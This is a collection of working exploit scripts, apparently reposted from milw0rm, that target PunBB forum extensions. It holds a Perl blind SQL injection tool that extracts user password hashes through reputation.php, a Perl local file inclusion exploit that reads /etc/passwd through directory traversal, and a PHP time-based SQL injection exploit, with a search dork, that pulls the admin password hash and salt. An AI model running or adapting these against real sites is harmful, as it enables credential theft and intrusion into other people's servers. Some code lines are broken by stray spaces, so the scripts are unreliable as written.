sub Blind_SQL_Jnjection{
my ($dec,$hex) = @_;
return "Dante90, WaRWolFz Crew\" OR ASCII(SUBSTRING((SELECT `password` FROM `users` WHERE `id`=${ID}),${dec},1))=${hex}/*";
}

for(my $I=1; $I<=40; $I++){ #N Hash characters
for(my $J=0; $J<=15; $J++){ #0 -> F
my $Post = $HTTP->post($Host.'reputation.php?',[
form_sent => '1',
pid => '2',
poster => Blind_SQL_Jnjection($I,$chars[$J]),
method => '1',
req_message => 'http://www.warwolfz.com/',
submit => 'Submit',
]) || die $!;
$Time = request($Referrer);
refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
if($Post->content =~ /(The reputation has been successfully changed)/i){
syswrite(STDOUT,chr($chars[$J]));
$Hash .= chr($chars[$J]);
$Time = request($Referrer);
refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
last;
}
}
if($I == 1 && length $Hash < 1 && !$Hash){
print " * Exploit Failed *\n";
print " ------------------------------------------------------ \n";
exit;
}
if($I == 40){
print " * Exploit Successed *\n";
print " ------------------------------------------------------\n ";
system("pause");
}
}

sub usage{
system("cls");
{
print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit\n";
print " ------------------------------------------------------ \n";
print " * USAGE: *\n";
print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";
print " * perl name_exploit.pl [username] [password] [id] *\n";
print " ------------------------------------------------------ \n";
print " * Powered By Dante90, WaRWolFz Crew *\n";
print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
print " ------------------------------------------------------ \n";
};
exit;
}

sub request{
$Referrer = $_[0];
$Method->content_type('application/x-www-form-urlencoded');
$Method->content($Referrer);
$Start = Time::HiRes::time();
$Response = $HTTP->request($Method);
$Response->is_success() or die "$Host : ", $Response->message,"\n";
$End = Time::HiRes::time();
$Time = $End - $Start;
return $Time;
}

sub refresh{
system("cls");
{
print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit\n";
print " ------------------------------------------------------ \n";
print " * USAGE: *\n";
print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";
print " * perl name_exploit.pl [username] [password] [id] *\n";
print " ------------------------------------------------------ \n";
print " * Powered By Dante90, WaRWolFz Crew *\n";
print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
print " ------------------------------------------------------ \n";
};
print $_[0] ."\n";
print " * Victime Site: " . $_[1] . "\n";
print " * Default Time: " . $_[2] . " seconds\n";
print " * BruteForcing Hash: " . chr($chars[$_[3]]) . "\n";
print " * BruteForcing N Char Hash: " . $_[6] . "\n";
print " * SQL Time: " . $_[5] . " seconds\n";
print " * Hash: " . $_[4] . "\n";
}

#WaRWolFz Crew

# milw0rm.com [2009-07-28]

PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit

#!/usr/bin/perl
#[0-Day] PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit
#Coded By Dante90, WaRWolFz Crew
#Bug Discovered By: Dante90, WaRWolFz Crew
#register_globals = On
#magic_quotes_gpc = On


use LWP::UserAgent;
use HTTP::Cookies;
use strict;

my $EtcPasswd;
my $TransversalDirectory = "./../../../../"; #Transversal Directory
my $LFI = "etc/passwd"; #File Inject
my $HostName = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link

my $Referrer = "http://www.warwolfz.com/";

my $Cookies = new HTTP::Cookies;
my $UserAgent = new LWP::UserAgent(
agent => 'Mozilla/5.0',
max_redirect => 0,

cookie_jar => $Cookies,
) or die $!;

sub Local_File_Inclusion{
my ($Directory,$Command) = @_;
return "./include/reputation/rep_profile.php?pun_user[language]=${Directory}${Command}%00";

}

my $Get = $UserAgent->get($HostName.Local_File_Inclusion($TransversalDir ectory,$LFI));

if ($Get->content =~ /No such file or directory in/i){
refresh($HostName, "Exploit Filed");
print " * Error extracting sensible data.\n";

print " * Exploit Failed *\n";
print " ------------------------------------------------------ \n\n";
}else{
$EtcPasswd = $Get->content;
open ( FILE , ">WaRWolFz.html" ) or die $!;

print FILE $EtcPasswd;
close ( FILE );
refresh($HostName, "File Saved");
print " * Exploit Successed *\n";
print " ------------------------------------------------------\n\n";

system("pause");
}

sub usage{
system("cls");
{
print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit\n";
print " ------------------------------------------------------ \n";

print " * USAGE: *\n";
print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";
print " * perl name_exploit.pl *\n";

print " ------------------------------------------------------ \n";
print " * Powered By Dante90, WaRWolFz Crew *\n";
print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";

print " ------------------------------------------------------ \n";
};
exit;
}

sub refresh{
system("cls");
{
print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit\n";

print " ------------------------------------------------------ \n";
print " * USAGE: *\n";
print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";

print " * perl name_exploit.pl *\n";
print " ------------------------------------------------------ \n";
print " * Powered By Dante90, WaRWolFz Crew *\n";

print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
print " ------------------------------------------------------ \n";

};
print " * Victime Site: " . $_[0] . "\n";
print " * Etc/Passwd: " . $_[1] . "\n";
}

#WaRWolFz

# milw0rm.com [2009-07-30]

Punbb Extension Attachment <= v1.0.2 Bind SQL injection exploit

f (isset($_GET['secure_str']))
{
if (preg_match('~(\d+)f(\d+)~', $_GET['secure_str'], $match))
{
...
'WHERE' => 'a.id = '.$attach_item.' AND (fp.read_forum IS NULL OR fp.read_forum = 1)
Злоупотребление preg_match:(


#!/usr/bin/php
<?php

print_r('
+---------------------------------------------------------------------------+
Punbb Extension Attachment <= v1.0.2 Bind SQL injection exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by PunBB"
+---------------------------------------------------------------------------+
');
/**
* works regardless of php.ini settings
*/
if ($argc < 3) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to punbb
Example:
php '.$argv[0].' localhost /punbb/
+---------------------------------------------------------------------------+
');
exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];

$pre = 'pun_';

$benchmark = 200000000;
$timeout = 10;

echo "Plz Waiting...\nPassword:\n";
/**
* get pass
*/
$j = 1;
$pass = '';

$hash[0] = 0; //null
$hash = array_merge($hash, range(48, 57)); //numbers
$hash = array_merge($hash, range(97, 122)); //az letters

while (strlen($pass) < 40) {
for ($i = 0; $i <= 255; $i ++) {
if (in_array($i, $hash)) {
$cmd = '1f1%27%20AND%20(IF((ASCII(SUBSTRING((SELECT%20pas sword%20FROM%20'.$pre.'users%20WHERE%20group_id=1% 20LIMIT%201),'.$j.',1))='.$i.'),BENCHMARK('.$bench mark.',CHAR(0)),1))%23';
send();
usleep(2000000);
$starttime = time();
send();
$endtime = time();
$difftime = $endtime - $starttime;
if ($difftime > $timeout) {
$pass .= chr($i);
echo chr($i);
break;
}
}
if ($i == 255)
exit("\nExploit Failed!\n");
}
$j ++;
}

echo "\nSalt:\n";
/**
* get salt
*/
$j = 1;
$salt = '';

$hash[0] = 0; //null
$hash = array_merge($hash, range(33, 126));

while (strlen($salt) < 12) {
for ($i = 0; $i <= 255; $i ++) {
if (in_array($i, $hash)) {
$cmd = '1f1%27%20AND%20(IF((ASCII(SUBSTRING((SELECT%20sal t%20FROM%20'.$pre.'users%20WHERE%20group_id=1%20LI MIT%201),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark .',CHAR(0)),1))%23';
send();
usleep(2000000);
$starttime = time();
send();
$endtime = time();
$difftime = $endtime - $starttime;
if ($difftime > $timeout) {
$salt .= chr($i);
echo chr($i);
break;
}
}
if ($i == 255)
exit("\nExploit Failed!\n");
}
$j ++;
}

exit("\nExpoilt Success!\nPassword Hash:\t$pass\nSalt:\t$salt\n");

function send()
{
global $host, $path, $cmd;

$data = "GET ".$path."misc.php?item=1&secure_str=".$cmd." HTTP/1.1\r\n";
$data .= "Host: $host\r\n";
$data .= "Connection: Close\r\n\r\n";

$fp = fsockopen($host, 80);
fputs($fp, $data);

$resp = '';

while ($fp && !feof($fp))
$resp .= fread($fp, 1024);

return $resp;
}

?>